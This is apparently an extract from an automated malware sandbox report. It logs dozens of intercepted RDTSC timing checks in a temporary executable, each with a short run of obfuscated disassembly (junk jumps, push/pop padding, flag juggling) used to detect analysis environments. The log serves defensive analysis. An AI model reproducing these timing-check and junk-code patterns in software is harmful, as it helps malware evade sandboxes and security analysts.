Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B907F4 second address: 4B907FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B907FA second address: 4B907FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B4002F second address: 4B40055 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F69D121AB34h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B40055 second address: 4B40096 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D1080A4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F69D1080A56h 0x0000000f mov ebp, esp 0x00000011 jmp 00007F69D1080A50h 0x00000016 and esp, FFFFFFF8h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B40096 second address: 4B4009A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B4009A second address: 4B400A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B400A0 second address: 4B400A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B400A6 second address: 4B400AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B400AA second address: 4B400CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 jmp 00007F69D121AB2Ah 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F69D121AB2Eh 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B400CE second address: 4B400E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F69D1080A4Eh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B400E0 second address: 4B4012D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 jmp 00007F69D121AB37h 0x0000000e xchg eax, ebx 0x0000000f jmp 00007F69D121AB36h 0x00000014 push eax 0x00000015 jmp 00007F69D121AB2Bh 0x0000001a xchg eax, ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e movsx edi, ax 0x00000021 mov edi, eax 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B4012D second address: 4B40189 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, BABAh 0x00000007 pushfd 0x00000008 jmp 00007F69D1080A4Bh 0x0000000d adc al, 0000005Eh 0x00000010 jmp 00007F69D1080A59h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov ebx, dword ptr [ebp+10h] 0x0000001c jmp 00007F69D1080A4Eh 0x00000021 xchg eax, esi 0x00000022 jmp 00007F69D1080A50h 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B40189 second address: 4B401A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B401A5 second address: 4B401BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D1080A4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B401BB second address: 4B401BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B401BF second address: 4B401C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B401C3 second address: 4B401C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B401C9 second address: 4B40205 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D1080A4Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F69D1080A4Dh 0x00000015 sbb ax, C4B6h 0x0000001a jmp 00007F69D1080A51h 0x0000001f popfd 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B40205 second address: 4B40213 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F69D121AB2Ah 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B40213 second address: 4B40217 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B40217 second address: 4B40248 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov ax, dx 0x0000000d popad 0x0000000e mov dword ptr [esp], edi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov cx, A623h 0x00000018 jmp 00007F69D121AB38h 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B40248 second address: 4B4027B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D1080A4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b jmp 00007F69D1080A56h 0x00000010 je 00007F6A4346EDECh 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B4027B second address: 4B4027F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B4027F second address: 4B40285 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B40285 second address: 4B4028B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B4028B second address: 4B4028F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B4028F second address: 4B402A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B402A4 second address: 4B402A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B402A8 second address: 4B402AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B402AE second address: 4B402D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D1080A4Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F6A4346EDB1h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F69D1080A4Ah 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B402D4 second address: 4B402E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B402E3 second address: 4B40327 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D1080A59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [esi+44h] 0x0000000c jmp 00007F69D1080A4Eh 0x00000011 or edx, dword ptr [ebp+0Ch] 0x00000014 pushad 0x00000015 mov ebx, 776A6830h 0x0000001a popad 0x0000001b test edx, 61000000h 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B40327 second address: 4B4032B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B4032B second address: 4B4032F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B4032F second address: 4B40335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B40335 second address: 4B4037F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, CF8Ch 0x00000007 pushfd 0x00000008 jmp 00007F69D1080A55h 0x0000000d adc cl, 00000066h 0x00000010 jmp 00007F69D1080A51h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 jne 00007F6A4346ED64h 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F69D1080A4Dh 0x00000026 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B4037F second address: 4B403B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 movzx ecx, di 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c test byte ptr [esi+48h], 00000001h 0x00000010 jmp 00007F69D121AB2Bh 0x00000015 jne 00007F6A43608E2Dh 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F69D121AB30h 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B403B4 second address: 4B403BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B3070C second address: 4B30791 instructions: 0x00000000 rdtsc 0x00000002 mov bx, 5576h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F69D121AB38h 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F69D121AB31h 0x00000017 and ecx, 35479186h 0x0000001d jmp 00007F69D121AB31h 0x00000022 popfd 0x00000023 mov edx, eax 0x00000025 popad 0x00000026 xchg eax, ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F69D121AB2Fh 0x00000030 or cl, FFFFFFBEh 0x00000033 jmp 00007F69D121AB39h 0x00000038 popfd 0x00000039 pushad 0x0000003a popad 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B30791 second address: 4B307E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D1080A57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F69D1080A56h 0x00000010 and esp, FFFFFFF8h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F69D1080A57h 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B307E0 second address: 4B3081E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F69D121AB2Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F69D121AB2Dh 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B3081E second address: 4B30822 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B30822 second address: 4B30828 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B30828 second address: 4B3083F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F69D1080A53h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B3083F second address: 4B3085C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F69D121AB2Eh 0x00000011 push esi 0x00000012 pop edi 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B3085C second address: 4B30862 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B30862 second address: 4B30866 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B30866 second address: 4B30875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B30875 second address: 4B30879 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B30879 second address: 4B3087F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B3087F second address: 4B308AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB36h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F69D121AB2Ah 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B308AA second address: 4B308B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D1080A4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B308B9 second address: 4B30931 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F69D121AB2Fh 0x00000009 and cx, F11Eh 0x0000000e jmp 00007F69D121AB39h 0x00000013 popfd 0x00000014 mov esi, 134202E7h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov esi, dword ptr [ebp+08h] 0x0000001f jmp 00007F69D121AB2Ah 0x00000024 sub ebx, ebx 0x00000026 jmp 00007F69D121AB31h 0x0000002b test esi, esi 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F69D121AB38h 0x00000036 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B30931 second address: 4B30940 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D1080A4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B30940 second address: 4B309BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F6A43610557h 0x0000000f pushad 0x00000010 mov cx, 2A23h 0x00000014 pushfd 0x00000015 jmp 00007F69D121AB38h 0x0000001a sbb cx, 4568h 0x0000001f jmp 00007F69D121AB2Bh 0x00000024 popfd 0x00000025 popad 0x00000026 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000002d jmp 00007F69D121AB36h 0x00000032 mov ecx, esi 0x00000034 pushad 0x00000035 push ecx 0x00000036 movsx edi, cx 0x00000039 pop ecx 0x0000003a pushad 0x0000003b mov bx, 82F8h 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B309BF second address: 4B309E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 je 00007F6A43476424h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F69D1080A58h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B309E5 second address: 4B309EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B309EB second address: 4B309EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B309EF second address: 4B30A3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test byte ptr [76FB6968h], 00000002h 0x0000000f jmp 00007F69D121AB39h 0x00000014 jne 00007F6A436104C5h 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushfd 0x0000001e jmp 00007F69D121AB2Ah 0x00000023 sbb ah, FFFFFFE8h 0x00000026 jmp 00007F69D121AB2Bh 0x0000002b popfd 0x0000002c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B30A3A second address: 4B30A46 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 49CD76DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B30A46 second address: 4B30AA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F69D121AB30h 0x0000000a jmp 00007F69D121AB35h 0x0000000f popfd 0x00000010 popad 0x00000011 popad 0x00000012 mov edx, dword ptr [ebp+0Ch] 0x00000015 pushad 0x00000016 pushad 0x00000017 mov di, ax 0x0000001a mov edi, eax 0x0000001c popad 0x0000001d jmp 00007F69D121AB32h 0x00000022 popad 0x00000023 xchg eax, ebx 0x00000024 jmp 00007F69D121AB30h 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B30AA9 second address: 4B30AAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B30AAD second address: 4B30AB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B30AB1 second address: 4B30AB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B30AB7 second address: 4B30ABD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B30ABD second address: 4B30AC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B30AC1 second address: 4B30AC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B30AC5 second address: 4B30B23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 jmp 00007F69D1080A4Dh 0x0000000e xchg eax, ebx 0x0000000f jmp 00007F69D1080A4Eh 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F69D1080A53h 0x0000001e and eax, 4CA18C5Eh 0x00000024 jmp 00007F69D1080A59h 0x00000029 popfd 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B30B6F second address: 4B30B80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B30B80 second address: 4B30BE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D1080A51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F69D1080A58h 0x00000011 or cx, 56A8h 0x00000016 jmp 00007F69D1080A4Bh 0x0000001b popfd 0x0000001c popad 0x0000001d pop ebx 0x0000001e jmp 00007F69D1080A56h 0x00000023 mov esp, ebp 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B30BE1 second address: 4B30BE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B40A7A second address: 4B40A80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B40A80 second address: 4B40A84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4B40A84 second address: 4B40AFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F69D1080A54h 0x00000010 xor si, FF48h 0x00000015 jmp 00007F69D1080A4Bh 0x0000001a popfd 0x0000001b push esi 0x0000001c pushfd 0x0000001d jmp 00007F69D1080A4Fh 0x00000022 adc ax, E18Eh 0x00000027 jmp 00007F69D1080A59h 0x0000002c popfd 0x0000002d pop esi 0x0000002e popad 0x0000002f xchg eax, ebp 0x00000030 pushad 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F69D1080A53h 0x00000038 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4BB0FD5 second address: 4BB0FE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, 56D9h 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b mov cl, 54h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4BB043F second address: 4BB044F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F69D1080A4Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe RDTSC instruction interceptor: First address: 4BB044F second address: 4BB0453 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
